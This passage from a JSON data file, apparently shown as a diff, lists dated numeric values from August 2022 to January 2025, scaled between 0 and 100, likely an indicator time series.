], + [ + "2022-08-24", + 35.6955025839495 + ], + [ + "2022-08-25", + 37.259491481542106 + ], + [ + "2022-08-26", + 47.24043345433754 + ], + [ + "2022-08-29", + 47.76779368283193 + ], + [ + "2022-08-30", + 48.34373366084691 + ], + [ + "2022-08-31", + 42.15040461491502 + ], + [ + "2022-09-01", + 41.72504366252311 + ], + [ + "2022-09-02", + 42.3299990719021 + ], + [ + "2022-09-06", + 42.400929820571385 + ], + [ + "2022-09-07", + 45.94002488779266 + ], + [ + "2022-09-08", + 39.47298805247826 + ], + [ + "2022-09-09", + 43.97288996077731 + ], + [ + "2022-09-12", + 42.17108351040057 + ], + [ + "2022-09-13", + 58.00049750849258 + ], + [ + "2022-09-14", + 59.001521166661476 + ], + [ + "2022-09-15", + 59.52115159872054 + ], + [ + "2022-09-16", + 58.73387594819888 + ], + [ + "2022-09-19", + 58.71909128490971 + ], + [ + "2022-09-20", + 55.912955443654475 + ], + [ + "2022-09-21", + 57.013276138648905 + ], + [ + "2022-09-22", + 56.92713102775054 + ], + [ + "2022-09-23", + 53.83152578119152 + ], + [ + "2022-09-26", + 46.04778748475541 + ], + [ + "2022-09-27", + 46.10251618115244 + ], + [ + "2022-09-28", + 49.69034573770341 + ], + [ + "2022-09-29", + 53.474854896343615 + ], + [ + "2022-09-30", + 54.27092386952651 + ], + [ + "2022-10-03", + 58.50956105840231 + ], + [ + "2022-10-04", + 64.99542949192555 + ], + [ + "2022-10-05", + 62.27429182525373 + ], + [ + "2022-10-06", + 62.018395028110575 + ], + [ + "2022-10-07", + 64.4154949951402 + ], + [ + "2022-10-10", + 62.38833249820148 + ], + [ + "2022-10-11", + 47.92153825780433 + ], + [ + "2022-10-12", + 46.891105430504986 + ], + [ + "2022-10-13", + 50.95054733737855 + ], + [ + "2022-10-14", + 55.148771685805606 + ], + [ + "2022-10-17", + 62.59321528882622 + ], + [ + "2022-10-18", + 63.26571294330912 + ], + [ + "2022-10-19", + 61.86166039366374 + ], + [ + "2022-10-20", + 61.324664439426314 + ], + [ + "2022-10-21", + 63.52796435809452 + ], + [ + "2022-10-24", + 64.07108216230267 + ], + [ + "2022-10-25", + 66.04698339496964 + ], + [ + "2022-10-26", + 66.97725978020961 + ], + [ + "2022-10-27", + 64.44017951176217 + ], + [ + "2022-10-28", + 67.06662115450328 + ], + [ + "2022-10-31", + 65.49683441445757 + ], + [ + "2022-11-01", + 60.503381194431796 + ], + [ + "2022-11-02", + 66.49193824335612 + ], + [ + "2022-11-03", + 67.75627306280504 + ], + [ + "2022-11-04", + 62.27036413171512 + ], + [ + "2022-11-07", + 62.35618694812444 + ], + [ + "2022-11-08", + 60.93774328713859 + ], + [ + "2022-11-09", + 64.04055116710079 + ], + [ + "2022-11-10", + 87.94334774688447 + ], + [ + "2022-11-11", + 83.61448212518134 + ], + [ + "2022-11-14", + 80.428420333453 + ], + [ + "2022-11-15", + 80.81641772842774 + ], + [ + "2022-11-16", + 81.90580301003236 + ], + [ + "2022-11-17", + 81.69817331215286 + ], + [ + "2022-11-18", + 79.53032342169007 + ], + [ + "2022-11-21", + 79.02469609939055 + ], + [ + "2022-11-22", + 77.81736664424591 + ], + [ + "2022-11-23", + 75.38655797940906 + ], + [ + "2022-11-25", + 72.1843841865771 + ], + [ + "2022-11-28", + 67.23700100430588 + ], + [ + "2022-11-29", + 65.64194509831188 + ], + [ + "2022-11-30", + 75.27875147705087 + ], + [ + "2022-12-01", + 65.92198272998117 + ], + [ + "2022-12-02", + 62.177440229764 + ], + [ + "2022-12-05", + 64.23752692864572 + ], + [ + "2022-12-06", + 63.794553073849094 + ], + [ + "2022-12-07", + 63.92242029709556 + ], + [ + "2022-12-08", + 59.38481526075977 + ], + [ + "2022-12-09", + 14.161653579637232 + ], + [ + "2022-12-12", + 11.738357554989008 + ], + [ + "2022-12-13", + 12.0872824630619 + ], + [ + "2022-12-14", + 10.73013022593958 + ], + [ + "2022-12-15", + 20.206838677869086 + ], + [ + "2022-12-16", + 20.88575231157249 + ], + [ + "2022-12-19", + 22.227879244404374 + ], + [ + "2022-12-20", + 21.625641353429618 + ], + [ + "2022-12-21", + 21.783912818336454 + ], + [ + "2022-12-22", + 24.4477300486201 + ], + [ + "2022-12-23", + 24.547915507225706 + ], + [ + "2022-12-27", + 24.445522821979736 + ], + [ + "2022-12-28", + 25.232535046640407 + ], + [ + "2022-12-29", + 7.589799657524171 + ], + [ + "2022-12-30", + 7.341315817261705 + ], + [ + "2023-01-03", + 7.410952152056128 + ], + [ + "2023-01-04", + 6.684214664990296 + ], + [ + "2023-01-05", + 4.761601728470367 + ], + [ + "2023-01-06", + 14.47254760070797 + ], + [ + "2023-01-09", + 13.220323436591782 + ], + [ + "2023-01-10", + 14.314641665208717 + ], + [ + "2023-01-11", + 15.864046184608641 + ], + [ + "2023-01-12", + 14.779396760026378 + ], + [ + "2023-01-13", + 14.9784717665985 + ], + [ + "2023-01-17", + 2.270991068233431 + ], + [ + "2023-01-18", + 2.9506499296854893 + ], + [ + "2023-01-19", + 1.8588850798669831 + ], + [ + "2023-01-20", + 9.70054235505967 + ], + [ + "2023-01-23", + 12.367544412367296 + ], + [ + "2023-01-24", + 4.169551687959771 + ], + [ + "2023-01-25", + 4.541583491829412 + ], + [ + "2023-01-26", + 2.977181955553899 + ], + [ + "2023-01-27", + 0.0 + ], + [ + "2023-01-30", + 3.925526532282138 + ], + [ + "2023-01-31", + 4.9654248685026365 + ], + [ + "2023-02-01", + 5.885934070644213 + ], + [ + "2023-02-02", + 14.413454741783946 + ], + [ + "2023-02-03", + 15.210526642190558 + ], + [ + "2023-02-06", + 13.812861321751793 + ], + [ + "2023-02-07", + 16.0212372658171 + ], + [ + "2023-02-08", + 22.012259446913557 + ], + [ + "2023-02-09", + 22.51872174293882 + ], + [ + "2023-02-10", + 23.662123526355852 + ], + [ + "2023-02-13", + 25.027644023217277 + ], + [ + "2023-02-14", + 25.06657836305619 + ], + [ + "2023-02-15", + 22.177573985274233 + ], + [ + "2023-02-16", + 25.601943702709217 + ], + [ + "2023-02-17", + 21.42108781783154 + ], + [ + "2023-02-21", + 23.96067882954265 + ], + [ + "2023-02-22", + 23.87936922150919 + ], + [ + "2023-02-23", + 24.245490154808607 + ], + [ + "2023-02-24", + 23.815716666763553 + ], + [ + "2023-02-27", + 23.402082455182615 + ], + [ + "2023-02-28", + 19.297320403814894 + ], + [ + "2023-03-01", + 17.618886447949723 + ], + [ + "2023-03-02", + 12.971472312156795 + ], + [ + "2023-03-03", + 3.3233507523969212 + ], + [ + "2023-03-06", + 0.3273934390313992 + ], + [ + "2023-03-07", + 1.270389999701703 + ], + [ + "2023-03-08", + 0.0 + ], + [ + "2023-03-09", + 0.0 + ], + [ + "2023-03-10", + 1.15490154346394 + ], + [ + "2023-03-13", + 1.923258392159701 + ], + [ + "2023-03-14", + 5.463301797130818 + ], + [ + "2023-03-15", + 5.033475419315504 + ], + [ + "2023-03-16", + 12.94131819859024 + ], + [ + "2023-03-17", + 9.10122266450705 + ], + [ + "2023-03-20", + 8.507067245943725 + ], + [ + "2023-03-21", + 2.637422386198326 + ], + [ + "2023-03-22", + 5.739442515963097 + ], + [ + "2023-03-23", + 6.430402298142949 + ], + [ + "2023-03-24", + 1.6919023652324627 + ], + [ + "2023-03-27", + 2.638464522534256 + ], + [ + "2023-03-28", + 3.223950405281606 + ], + [ + "2023-03-29", + 4.612932753124611 + ], + [ + "2023-03-30", + 4.733446689343432 + ], + [ + "2023-03-31", + 3.25132840788075 + ], + [ + "2023-04-03", + 3.6132603357463675 + ], + [ + "2023-04-04", + 0.9714231323772227 + ], + [ + "2023-04-05", + 3.4531704819680096 + ], + [ + "2023-04-06", + 0.0 + ], + [ + "2023-04-10", + 0.0 + ], + [ + "2023-04-11", + 1.496678296514376 + ], + [ + "2023-04-12", + 0.0 + ], + [ + "2023-04-13", + 3.444533798407817 + ], + [ + "2023-04-14", + 0.0 + ], + [ + "2023-04-17", + 0.0 + ], + [ + "2023-04-18", + 0.014210581690326022 + ], + [ + "2023-04-19", + 0.0 + ], + [ + "2023-04-20", + 0.0 + ], + [ + "2023-04-21", + 0.0 + ], + [ + "2023-04-24", + 0.017102474842721094 + ], + [ + "2023-04-25", + 4.557653602900262 + ], + [ + "2023-04-26", + 4.454132675594466 + ], + [ + "2023-04-27", + 9.380906007506363 + ], + [ + "2023-04-28", + 8.989638889816815 + ], + [ + "2023-05-01", + 5.790027827826976 + ], + [ + "2023-05-02", + 6.742201683802559 + ], + [ + "2023-05-03", + 7.132100341776897 + ], + [ + "2023-05-04", + 5.85802890606971 + ], + [ + "2023-05-05", + 10.498204428447808 + ], + [ + "2023-05-08", + 10.521236620001126 + ], + [ + "2023-05-09", + 10.519750804095251 + ], + [ + "2023-05-10", + 10.364049565076309 + ], + [ + "2023-05-11", + 6.395649484082486 + ], + [ + "2023-05-12", + 6.539574687514005 + ], + [ + "2023-05-15", + 6.753628689526682 + ], + [ + "2023-05-16", + 6.742909640344495 + ], + [ + "2023-05-17", + 8.08947839480557 + ], + [ + "2023-05-18", + 9.774044205842916 + ], + [ + "2023-05-19", + 10.122506457866022 + ], + [ + "2023-05-22", + 9.912739092922724 + ], + [ + "2023-05-23", + 6.95283971834362 + ], + [ + "2023-05-24", + 8.061479652545136 + ], + [ + "2023-05-25", + 6.302530646568997 + ], + [ + "2023-05-26", + 12.75970064437958 + ], + [ + "2023-05-30", + 12.796421485790843 + ], + [ + "2023-05-31", + 12.297101975521262 + ], + [ + "2023-06-01", + 11.365166527970661 + ], + [ + "2023-06-02", + 10.521190784148152 + ], + [ + "2023-06-05", + 7.503119856384815 + ], + [ + "2023-06-06", + 7.8190863195762805 + ], + [ + "2023-06-07", + 12.697356009557073 + ], + [ + "2023-06-08", + 12.831692129714185 + ], + [ + "2023-06-09", + 12.809847269340494 + ], + [ + "2023-06-12", + 14.057421211757697 + ], + [ + "2023-06-13", + 14.129645812452956 + ], + [ + "2023-06-14", + 13.943370359761984 + ], + [ + "2023-06-15", + 13.898507298662619 + ], + [ + "2023-06-16", + 13.313415607329945 + ], + [ + "2023-06-20", + 13.199398434886595 + ], + [ + "2023-06-21", + 17.183021583928713 + ], + [ + "2023-06-22", + 14.009206319029238 + ], + [ + "2023-06-23", + 15.482603992431255 + ], + [ + "2023-06-26", + 13.522475390476094 + ], + [ + "2023-06-27", + 8.916027034675741 + ], + [ + "2023-06-28", + 8.815865817709343 + ], + [ + "2023-06-29", + 7.9255540562338815 + ], + [ + "2023-06-30", + 8.918497516830035 + ], + [ + "2023-07-03", + 8.508590574036909 + ], + [ + "2023-07-05", + 8.561866112016226 + ], + [ + "2023-07-06", + 9.879171533517003 + ], + [ + "2023-07-07", + 4.819081517134434 + ], + [ + "2023-07-10", + 3.470422704712164 + ], + [ + "2023-07-11", + 3.529784860205581 + ], + [ + "2023-07-12", + 1.5270362600392382 + ], + [ + "2023-07-13", + 4.582688281513108 + ], + [ + "2023-07-14", + 4.222073591978761 + ], + [ + "2023-07-17", + 3.5215201883459315 + ], + [ + "2023-07-18", + 2.9743428505941254 + ], + [ + "2023-07-19", + 2.8046679118722047 + ], + [ + "2023-07-20", + 9.203000634484788 + ], + [ + "2023-07-21", + 8.1468143142374 + ], + [ + "2023-07-24", + 6.186025993551838 + ], + [ + "2023-07-25", + 2.7032861077488968 + ], + [ + "2023-07-26", + 0.0 + ], + [ + "2023-07-27", + 0.3426287112774597 + ], + [ + "2023-07-28", + 4.314987380461352 + ], + [ + "2023-07-31", + 1.6164697592284127 + ], + [ + "2023-08-01", + 1.9129543549501848 + ], + [ + "2023-08-02", + 9.996366120339093 + ], + [ + "2023-08-03", + 9.081391312228385 + ], + [ + "2023-08-04", + 9.254445485971194 + ], + [ + "2023-08-07", + 10.04741312291145 + ], + [ + "2023-08-08", + 11.058823952504492 + ], + [ + "2023-08-09", + 10.524636264605563 + ], + [ + "2023-08-10", + 5.91247187797804 + ], + [ + "2023-08-11", + 6.2739010089533656 + ], + [ + "2023-08-14", + 6.954353839232735 + ], + [ + "2023-08-15", + 6.3618457830893425 + ], + [ + "2023-08-16", + 7.24858146857066 + ], + [ + "2023-08-17", + 1.6492369950578782 + ], + [ + "2023-08-18", + 1.6641513532361338 + ], + [ + "2023-08-21", + 6.836869931915516 + ], + [ + "2023-08-22", + 5.671869638565259 + ], + [ + "2023-08-23", + 10.202733140409064 + ], + [ + "2023-08-24", + 15.864616335591574 + ], + [ + "2023-08-25", + 11.5793673262742 + ], + [ + "2023-08-28", + 12.83562985204632 + ], + [ + "2023-08-29", + 19.82022883274666 + ], + [ + "2023-08-30", + 14.374303041276423 + ], + [ + "2023-08-31", + 14.372087432496155 + ], + [ + "2023-09-01", + 14.04650737723092 + ], + [ + "2023-09-05", + 13.21042147167418 + ], + [ + "2023-09-06", + 13.276140327414899 + ], + [ + "2023-09-07", + 12.252834612034478 + ], + [ + "2023-09-08", + 12.240910975496751 + ], + [ + "2023-09-11", + 12.97833156463911 + ], + [ + "2023-09-12", + 13.321705772885418 + ], + [ + "2023-09-13", + 11.792299052803987 + ], + [ + "2023-09-14", + 10.162742581056952 + ], + [ + "2023-09-15", + 12.798668932861974 + ], + [ + "2023-09-18", + 12.668928274075322 + ], + [ + "2023-09-19", + 9.650794605527377 + ], + [ + "2023-09-20", + 12.768137882066766 + ], + [ + "2023-09-21", + 13.629935036894592 + ], + [ + "2023-09-22", + 7.345798507396123 + ], + [ + "2023-09-25", + 6.624985546989477 + ], + [ + "2023-09-26", + 8.305574065354433 + ], + [ + "2023-09-27", + 0.0 + ], + [ + "2023-09-28", + 0.8260919893700847 + ], + [ + "2023-09-29", + 0.47039396417399026 + ], + [ + "2023-10-02", + 2.3011855175425597 + ], + [ + "2023-10-03", + 5.682928914326586 + ], + [ + "2023-10-04", + 9.084148494776462 + ], + [ + "2023-10-05", + 8.706079161054934 + ], + [ + "2023-10-06", + 13.409260638829624 + ], + [ + "2023-10-09", + 11.711535553293807 + ], + [ + "2023-10-10", + 10.98781070668963 + ], + [ + "2023-10-11", + 11.610277341031685 + ], + [ + "2023-10-12", + 10.708133056073683 + ], + [ + "2023-10-13", + 8.871532270281545 + ], + [ + "2023-10-16", + 10.86974118071937 + ], + [ + "2023-10-17", + 10.947573189643116 + ], + [ + "2023-10-18", + 10.805640710170417 + ], + [ + "2023-10-19", + 6.637907346198264 + ], + [ + "2023-10-20", + 9.937656250319996 + ], + [ + "2023-10-23", + 9.754474170407999 + ], + [ + "2023-10-24", + 7.814230773728317 + ], + [ + "2023-10-25", + 16.101858310404747 + ], + [ + "2023-10-26", + 19.11623163218644 + ], + [ + "2023-10-27", + 19.600282384417728 + ], + [ + "2023-10-30", + 20.387339476096923 + ], + [ + "2023-10-31", + 17.435891544968126 + ], + [ + "2023-11-01", + 18.939536484582785 + ], + [ + "2023-11-02", + 22.639568595142414 + ], + [ + "2023-11-03", + 20.944345826047755 + ], + [ + "2023-11-06", + 20.834312060472662 + ], + [ + "2023-11-07", + 21.516869727406345 + ], + [ + "2023-11-08", + 20.950067397166723 + ], + [ + "2023-11-09", + 21.538186515197154 + ], + [ + "2023-11-10", + 24.88301152069702 + ], + [ + "2023-11-13", + 25.35256277715468 + ], + [ + "2023-11-14", + 30.367203822833254 + ], + [ + "2023-11-15", + 26.955014029956732 + ], + [ + "2023-11-16", + 25.17513819734809 + ], + [ + "2023-11-17", + 20.678323244710004 + ], + [ + "2023-11-20", + 21.97048501138922 + ], + [ + "2023-11-21", + 23.062856594994948 + ], + [ + "2023-11-22", + 10.488605966920861 + ], + [ + "2023-11-24", + 0.2276638630091653 + ], + [ + "2023-11-27", + 1.134464484082782 + ], + [ + "2023-11-28", + 0.8084896347055078 + ], + [ + "2023-11-29", + 1.6095073621522844 + ], + [ + "2023-11-30", + 0.0 + ], + [ + "2023-12-01", + 0.0 + ], + [ + "2023-12-04", + 1.5914384411951878 + ], + [ + "2023-12-05", + 1.5434369956140737 + ], + [ + "2023-12-06", + 1.6476871823414008 + ], + [ + "2023-12-07", + 4.641097806995074 + ], + [ + "2023-12-08", + 2.602964600192835 + ], + [ + "2023-12-11", + 0.0 + ], + [ + "2023-12-12", + 0.12668343331064758 + ], + [ + "2023-12-13", + 0.0 + ], + [ + "2023-12-14", + 0.22322378052965186 + ], + [ + "2023-12-15", + 0.24236785016640705 + ], + [ + "2023-12-18", + 0.8462188205513406 + ], + [ + "2023-12-19", + 0.0 + ], + [ + "2023-12-20", + 8.066725716189628 + ], + [ + "2023-12-21", + 10.716430184613221 + ], + [ + "2023-12-22", + 10.237635136567556 + ], + [ + "2023-12-26", + 10.259423893509307 + ], + [ + "2023-12-27", + 10.286864110201366 + ], + [ + "2023-12-28", + 10.198676499574715 + ], + [ + "2023-12-29", + 11.078407633298944 + ], + [ + "2024-01-02", + 22.12645441390438 + ], + [ + "2024-01-03", + 22.900462407016757 + ], + [ + "2024-01-04", + 24.20335928289685 + ], + [ + "2024-01-05", + 22.736498939659768 + ], + [ + "2024-01-08", + 27.899599276407777 + ], + [ + "2024-01-09", + 27.771153505157535 + ], + [ + "2024-01-10", + 27.17910400695258 + ], + [ + "2024-01-11", + 26.00345204803851 + ], + [ + "2024-01-12", + 22.808838918993835 + ], + [ + "2024-01-16", + 22.787220657641498 + ], + [ + "2024-01-17", + 23.546179067285916 + ], + [ + "2024-01-18", + 27.625310819936544 + ], + [ + "2024-01-19", + 35.71445621948261 + ], + [ + "2024-01-22", + 28.822629703605564 + ], + [ + "2024-01-23", + 26.728248647269133 + ], + [ + "2024-01-24", + 27.066590388075767 + ], + [ + "2024-01-25", + 26.607145136981103 + ], + [ + "2024-01-26", + 28.176385318937275 + ], + [ + "2024-01-29", + 29.78164707201084 + ], + [ + "2024-01-30", + 30.571925766554074 + ], + [ + "2024-01-31", + 33.30836384640443 + ], + [ + "2024-02-01", + 31.46350926544172 + ], + [ + "2024-02-02", + 34.01735492267475 + ], + [ + "2024-02-05", + 34.59665588241189 + ], + [ + "2024-02-06", + 27.97007635615411 + ], + [ + "2024-02-07", + 29.298843158402033 + ], + [ + "2024-02-08", + 28.998046591814436 + ], + [ + "2024-02-09", + 30.167115858214395 + ], + [ + "2024-02-12", + 31.23568425014539 + ], + [ + "2024-02-13", + 39.24326132370617 + ], + [ + "2024-02-14", + 39.11733085225361 + ], + [ + "2024-02-15", + 35.91780000333984 + ], + [ + "2024-02-16", + 31.16678885099271 + ], + [ + "2024-02-20", + 33.628528430861984 + ], + [ + "2024-02-21", + 33.80575522917447 + ], + [ + "2024-02-22", + 51.589922629768914 + ], + [ + "2024-02-23", + 51.96943230388621 + ], + [ + "2024-02-26", + 51.19584562711508 + ], + [ + "2024-02-27", + 49.90768349639432 + ], + [ + "2024-02-28", + 52.723247300866824 + ], + [ + "2024-02-29", + 43.6389825349284 + ], + [ + "2024-03-01", + 49.396131481066405 + ], + [ + "2024-03-04", + 47.92527748312534 + ], + [ + "2024-03-05", + 58.71109401901761 + ], + [ + "2024-03-06", + 59.2503205753865 + ], + [ + "2024-03-07", + 62.38948806581498 + ], + [ + "2024-03-08", + 69.15157568649626 + ], + [ + "2024-03-11", + 67.15309619307486 + ], + [ + "2024-03-12", + 71.77263519748962 + ], + [ + "2024-03-13", + 66.19546999492185 + ], + [ + "2024-03-14", + 63.951843053763405 + ], + [ + "2024-03-15", + 68.01295812322543 + ], + [ + "2024-03-18", + 73.46978523243894 + ], + [ + "2024-03-19", + 71.98598439922431 + ], + [ + "2024-03-20", + 74.08811309360918 + ], + [ + "2024-03-21", + 49.975374097682206 + ], + [ + "2024-03-22", + 49.41568080733613 + ], + [ + "2024-03-25", + 50.02055474098548 + ], + [ + "2024-03-26", + 50.485649639882205 + ], + [ + "2024-03-27", + 49.2705811651111 + ], + [ + "2024-03-28", + 47.67306218579215 + ], + [ + "2024-04-01", + 39.26103593936372 + ], + [ + "2024-04-02", + 41.619935246917116 + ], + [ + "2024-04-03", + 28.859191978409278 + ], + [ + "2024-04-04", + 37.51248132867621 + ], + [ + "2024-04-05", + 34.084520628266695 + ], + [ + "2024-04-08", + 25.44381825659332 + ], + [ + "2024-04-09", + 25.117709672288196 + ], + [ + "2024-04-10", + 19.314968682588024 + ], + [ + "2024-04-11", + 27.780015883178915 + ], + [ + "2024-04-12", + 38.26315724524997 + ], + [ + "2024-04-15", + 43.22141463530379 + ], + [ + "2024-04-16", + 39.39882187383222 + ], + [ + "2024-04-17", + 43.63878052832651 + ], + [ + "2024-04-18", + 36.82330093293717 + ], + [ + "2024-04-19", + 46.42169893505347 + ], + [ + "2024-04-22", + 52.032204926178785 + ], + [ + "2024-04-23", + 62.55044179030688 + ], + [ + "2024-04-24", + 63.49212197005415 + ], + [ + "2024-04-25", + 62.92629903182736 + ], + [ + "2024-04-26", + 72.35025954339524 + ], + [ + "2024-04-29", + 72.88156816508177 + ], + [ + "2024-04-30", + 80.19672936071103 + ], + [ + "2024-05-01", + 80.33262761993304 + ], + [ + "2024-05-02", + 80.48432532718557 + ], + [ + "2024-05-03", + 88.08787220447802 + ], + [ + "2024-05-06", + 91.56985162084689 + ], + [ + "2024-05-07", + 91.2079126336656 + ], + [ + "2024-05-08", + 89.18736038192743 + ], + [ + "2024-05-09", + 82.25405434078019 + ], + [ + "2024-05-10", + 75.01108762872776 + ], + [ + "2024-05-13", + 65.6229753316076 + ], + [ + "2024-05-14", + 66.28943185866139 + ], + [ + "2024-05-15", + 64.94463225605051 + ], + [ + "2024-05-16", + 63.1741416021542 + ], + [ + "2024-05-17", + 43.34179403287491 + ], + [ + "2024-05-20", + 42.45096572053261 + ], + [ + "2024-05-21", + 37.79819481946783 + ], + [ + "2024-05-22", + 38.2719612861166 + ], + [ + "2024-05-23", + 38.02500538339364 + ], + [ + "2024-05-24", + 33.586985261650184 + ], + [ + "2024-05-28", + 33.56058218940265 + ], + [ + "2024-05-29", + 16.260445598619057 + ], + [ + "2024-05-30", + 20.35294382885414 + ], + [ + "2024-05-31", + 16.789957404050288 + ], + [ + "2024-06-03", + 0.6526735527943781 + ], + [ + "2024-06-04", + 0.0 + ], + [ + "2024-06-05", + 17.18155266148326 + ], + [ + "2024-06-06", + 17.11697024764851 + ], + [ + "2024-06-07", + 17.717650964911826 + ], + [ + "2024-06-10", + 17.785719650285746 + ], + [ + "2024-06-11", + 18.6930095561957 + ], + [ + "2024-06-12", + 23.058696838971684 + ], + [ + "2024-06-13", + 15.927290475491615 + ], + [ + "2024-06-14", + 15.121361055918317 + ], + [ + "2024-06-17", + 18.27495784185624 + ], + [ + "2024-06-18", + 18.099231447103904 + ], + [ + "2024-06-20", + 23.253443855168054 + ], + [ + "2024-06-21", + 24.30434278016368 + ], + [ + "2024-06-24", + 29.93531675708576 + ], + [ + "2024-06-25", + 31.126060720694497 + ], + [ + "2024-06-26", + 31.04329393187013 + ], + [ + "2024-06-27", + 27.388325107668017 + ], + [ + "2024-06-28", + 22.250850784416407 + ], + [ + "2024-07-01", + 21.988110016351882 + ], + [ + "2024-07-02", + 24.075875274651278 + ], + [ + "2024-07-03", + 24.902307541143184 + ], + [ + "2024-07-05", + 14.221842730117965 + ], + [ + "2024-07-08", + 13.585450480995394 + ], + [ + "2024-07-09", + 12.85162537351937 + ], + [ + "2024-07-10", + 15.069684562114046 + ], + [ + "2024-07-11", + 41.060446537239116 + ], + [ + "2024-07-12", + 36.93501188261868 + ], + [ + "2024-07-15", + 36.514415406933374 + ], + [ + "2024-07-16", + 36.255987538286746 + ], + [ + "2024-07-17", + 62.946456312730604 + ], + [ + "2024-07-18", + 63.56249979775947 + ], + [ + "2024-07-19", + 64.13851886688097 + ], + [ + "2024-07-22", + 70.52310662570818 + ], + [ + "2024-07-23", + 66.90834894877516 + ], + [ + "2024-07-24", + 97.34693141487472 + ], + [ + "2024-07-25", + 98.91969078086872 + ], + [ + "2024-07-26", + 100.0 + ], + [ + "2024-07-29", + 100.0 + ], + [ + "2024-07-30", + 100.0 + ], + [ + "2024-07-31", + 100.0 + ], + [ + "2024-08-01", + 100.0 + ], + [ + "2024-08-02", + 100.0 + ], + [ + "2024-08-05", + 100.0 + ], + [ + "2024-08-06", + 100.0 + ], + [ + "2024-08-07", + 96.26796889049278 + ], + [ + "2024-08-08", + 100.0 + ], + [ + "2024-08-09", + 99.80897294409846 + ], + [ + "2024-08-12", + 99.77491682113953 + ], + [ + "2024-08-13", + 100.0 + ], + [ + "2024-08-14", + 93.07887808650372 + ], + [ + "2024-08-15", + 99.88893186213042 + ], + [ + "2024-08-16", + 99.15320023621447 + ], + [ + "2024-08-19", + 98.71271324510164 + ], + [ + "2024-08-20", + 98.62955285294426 + ], + [ + "2024-08-21", + 84.64443733351906 + ], + [ + "2024-08-22", + 86.28898395544239 + ], + [ + "2024-08-23", + 86.4571556658527 + ], + [ + "2024-08-26", + 87.81859983799058 + ], + [ + "2024-08-27", + 85.34364444732057 + ], + [ + "2024-08-28", + 78.17544418217012 + ], + [ + "2024-08-29", + 71.05927388026505 + ], + [ + "2024-08-30", + 63.37806385596338 + ], + [ + "2024-09-03", + 64.53826812778361 + ], + [ + "2024-09-04", + 64.47969888038402 + ], + [ + "2024-09-05", + 62.17839464592046 + ], + [ + "2024-09-06", + 61.68204664194899 + ], + [ + "2024-09-09", + 63.41324799258341 + ], + [ + "2024-09-10", + 64.30480722464777 + ], + [ + "2024-09-11", + 62.56061518690831 + ], + [ + "2024-09-12", + 63.64606755813952 + ], + [ + "2024-09-13", + 55.60003691430588 + ], + [ + "2024-09-16", + 55.84911107091403 + ], + [ + "2024-09-17", + 53.22989521572752 + ], + [ + "2024-09-18", + 53.380224420911794 + ], + [ + "2024-09-19", + 62.219518617172966 + ], + [ + "2024-09-20", + 58.67574093630966 + ], + [ + "2024-09-23", + 57.3455314576384 + ], + [ + "2024-09-24", + 56.04321271556648 + ], + [ + "2024-09-25", + 55.99547782348044 + ], + [ + "2024-09-26", + 54.14959658165205 + ], + [ + "2024-09-27", + 54.7816301311518 + ], + [ + "2024-09-30", + 53.379060887216255 + ], + [ + "2024-10-01", + 41.2550948450593 + ], + [ + "2024-10-02", + 40.85445377750429 + ], + [ + "2024-10-03", + 40.98043859691525 + ], + [ + "2024-10-04", + 25.522810995862212 + ], + [ + "2024-10-07", + 28.166462052183615 + ], + [ + "2024-10-08", + 30.035199655837673 + ], + [ + "2024-10-09", + 23.722125712757812 + ], + [ + "2024-10-10", + 22.73332936317967 + ], + [ + "2024-10-11", + 22.62454754781058 + ], + [ + "2024-10-14", + 22.57252258397594 + ], + [ + "2024-10-15", + 27.44702972961705 + ], + [ + "2024-10-16", + 26.745722359804187 + ], + [ + "2024-10-17", + 14.038584319317335 + ], + [ + "2024-10-18", + 14.404780619028015 + ], + [ + "2024-10-21", + 14.373291179103227 + ], + [ + "2024-10-22", + 14.038447262414827 + ], + [ + "2024-10-23", + 20.064020175282728 + ], + [ + "2024-10-24", + 20.351744979679438 + ], + [ + "2024-10-25", + 20.088728999201777 + ], + [ + "2024-10-28", + 20.009586377587375 + ], + [ + "2024-10-29", + 16.02866965340606 + ], + [ + "2024-10-30", + 17.944900120207222 + ], + [ + "2024-10-31", + 32.103434947851675 + ], + [ + "2024-11-01", + 30.44009233285819 + ], + [ + "2024-11-04", + 28.242345246489293 + ], + [ + "2024-11-05", + 27.28425305072793 + ], + [ + "2024-11-06", + 39.17271391805558 + ], + [ + "2024-11-07", + 42.354527455989135 + ], + [ + "2024-11-08", + 42.35632679990089 + ], + [ + "2024-11-11", + 41.6916184901623 + ], + [ + "2024-11-12", + 38.028932123485895 + ], + [ + "2024-11-13", + 38.15773679805646 + ], + [ + "2024-11-14", + 39.50798023846966 + ], + [ + "2024-11-15", + 49.17132438649422 + ], + [ + "2024-11-18", + 49.770047855739584 + ], + [ + "2024-11-19", + 50.3398101580685 + ], + [ + "2024-11-20", + 46.19947587608579 + ], + [ + "2024-11-21", + 45.564653349113385 + ], + [ + "2024-11-22", + 45.236414420471036 + ], + [ + "2024-11-25", + 45.2333950579764 + ], + [ + "2024-11-26", + 44.41982173306765 + ], + [ + "2024-11-27", + 44.59705461629715 + ], + [ + "2024-11-29", + 32.826956023857555 + ], + [ + "2024-12-02", + 33.70103477736335 + ], + [ + "2024-12-03", + 33.051401574112035 + ], + [ + "2024-12-04", + 32.87998794474996 + ], + [ + "2024-12-05", + 20.865630525573025 + ], + [ + "2024-12-06", + 17.394669100548 + ], + [ + "2024-12-09", + 19.145911885504088 + ], + [ + "2024-12-10", + 19.51953405486642 + ], + [ + "2024-12-11", + 25.45560035755993 + ], + [ + "2024-12-12", + 26.6005010746914 + ], + [ + "2024-12-13", + 25.694107240872732 + ], + [ + "2024-12-16", + 11.959111933557653 + ], + [ + "2024-12-17", + 13.385964103008233 + ], + [ + "2024-12-18", + 42.31139603584829 + ], + [ + "2024-12-19", + 42.82950880439807 + ], + [ + "2024-12-20", + 43.67869487364228 + ], + [ + "2024-12-23", + 44.667738344717 + ], + [ + "2024-12-24", + 46.68965387376715 + ], + [ + "2024-12-26", + 46.66482297255193 + ], + [ + "2024-12-27", + 48.81612901840538 + ], + [ + "2024-12-30", + 51.17266807723772 + ], + [ + "2024-12-31", + 50.61912549261367 + ], + [ + "2025-01-02", + 50.474999857022006 + ], + [ + "2025-01-03", + 52.133962418220904 + ], + [ + "2025-01-06", + 53.958525431511205 + ], + [ + "2025-01-07", + 57.18441706260946 + ], + [ + "2025-01-08", + 56.532495619075654 + ], + [ + "2025-01-10", + 59.525924925664974 + ], + [ + "2025-01-13", + 54.14097930695099 + ], + [ + "2025-01-14", + 53.87874477214758 + ], + [ + "2025-01-15", + 60.983160808536006 + ], + [ + "2025-01-16", + 57.651192108386816 + ], + [ + "2025-01-17", + 62.12924229872547 + ], + [ + 